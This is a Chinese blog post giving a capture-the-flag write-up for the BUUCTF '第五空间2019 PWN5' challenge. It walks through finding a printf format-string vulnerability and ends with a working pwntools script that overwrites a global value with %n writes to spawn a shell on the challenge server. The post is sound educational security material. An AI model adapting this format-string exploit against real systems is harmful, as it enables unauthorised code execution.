BUUCTF 第五空间2019PWN5

1.checksec+运行

32位/NX保护/canary保护

2.IDA进行中

1.main()函数

printf()函数 考虑格式化字符串漏洞

 通过0x61616161可以确定参数在第10个位置上

if ( atoi(nptr) == dword_804C044 )
  {
    puts("ok!!");
    system("/bin/sh");
  }

如何拿到binsh程序也给出了

直接利用格式化字符串改写unk_804C044之中的数据,然后输入数据对比得到shell

跟进dword_804C044看看是什么情况

 

0x48-0x44

0x804c044/0x804c045/ 0x804c046/0x804c047

需要修改具体四个位置

对应的

%10$n%11$n%12$n%13$n

3.脚本

from pwn import*
#p=process('./8pwn5')
p=remote("node4.buuoj.cn",25682)
payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+=b'%10$n%11$n%12$n%13$n'

p.sendline(payload)
p.sendline(str(0x10101010))//交互需要发送四字节字符串
p.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值